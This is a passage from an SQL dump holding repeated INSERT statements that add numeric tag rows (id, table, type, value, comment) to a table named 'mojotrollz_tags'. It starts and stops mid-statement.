(6624, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6625, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6626, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6627, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6628, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6629, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6641, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6642, 4, 1, 230, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6642, 4, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6643, 4, 1, 230, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6643, 4, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6644, 4, 1, 230, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6644, 4, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6645, 4, 1, 230, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6645, 4, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6646, 4, 1, 230, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6646, 4, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6661, 4, 1, 369, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6662, 4, 1, 369, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6701, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6721, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6722, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6741, 4, 1, 30, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6741, 4, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6761, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6762, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6781, 4, 1, 30, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6781, 4, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6801, 4, 1, 30, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6801, 4, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6804, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6805, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6821, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6822, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6823, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6824, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6825, 4, 1, 30, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6825, 4, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6826, 4, 1, 30, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6826, 4, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6827, 4, 1, 30, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6827, 4, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6844, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6845, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6846, 4, 1, 30, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6846, 4, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6847, 4, 1, 30, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6847, 4, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6848, 4, 1, 30, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6848, 4, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6861, 4, 1, 30, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6861, 4, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6862, 4, 1, 30, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6862, 4, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6881, 4, 1, 30, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6881, 4, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6921, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6941, 4, 1, 30, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6941, 4, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6942, 4, 1, 30, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6942, 4, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6943, 4, 1, 30, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6943, 4, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6961, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6962, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6963, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6964, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6982, 4, 1, 30, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6982, 4, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6983, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6984, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6985, 4, 1, 30, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6985, 4, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7001, 4, 1, 30, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7001, 4, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7002, 4, 1, 30, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7002, 4, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7003, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7022, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7023, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7024, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7025, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7026, 4, 1, 30, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7026, 4, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7027, 4, 1, 30, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7027, 4, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7028, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7029, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7041, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7042, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7043, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7044, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7045, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7061, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7062, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7063, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7064, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7065, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7067, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7068, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7070, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7081, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7082, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7101, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7102, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7121, 4, 1, 30, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7121, 4, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7122, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7123, 4, 1, 30, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7123, 4, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7124, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7141, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7142, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7161, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7162, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7163, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7164, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7165, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7166, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7167, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7168, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7169, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7170, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7171, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7172, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7181, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7201, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7202, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7223, 4, 1, 30, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7223, 4, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7224, 4, 1, 30, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7224, 4, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7241, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7261, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7281, 4, 1, 30, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7281, 4, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7282, 4, 1, 30, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7282, 4, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7301, 4, 1, 30, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7301, 4, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7302, 4, 1, 30, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7302, 4, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7321, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7341, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7342, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7361, 4, 1, 30, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7361, 4, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7362, 4, 1, 30, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7362, 4, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7363, 4, 1, 30, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7363, 4, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7364, 4, 1, 30, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7364, 4, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7365, 4, 1, 30, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7365, 4, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7366, 4, 1, 30, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7366, 4, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7367, 4, 1, 30, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7367, 4, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7368, 4, 1, 30, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7368, 4, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7381, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7382, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7383, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7385, 4, 1, 30, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7385, 4, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7386, 4, 1, 30, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7386, 4, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7424, 4, 1, 30, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7424, 4, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7427, 4, 1, 30, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7427, 4, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7428, 4, 1, 30, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7428, 4, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7429, 4, 1, 429, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7429, 4, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7441, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7461, 4, 1, 429, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7461, 4, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7462, 4, 1, 429, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7462, 4, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7463, 4, 1, 429, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7463, 4, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7481, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7482, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7483, 4, 1, 429, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7483, 4, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7484, 4, 1, 429, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7484, 4, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7485, 4, 1, 429, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7485, 4, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7486, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7488, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7489, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7491, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7492, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7493, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7494, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7496, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7497, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7509, 4, 1, 429, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7509, 4, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7541, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7562, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7563, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7564, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7581, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7582, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7583, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7601, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7602, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7603, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7621, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7622, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7623, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7624, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7625, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7626, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7627, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7628, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7629, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7630, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7631, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7637, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7638, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7639, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7640, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7641, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7642, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7643, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7645, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7646, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7647, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7648, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7652, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7653, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7654, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7655, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7656, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) 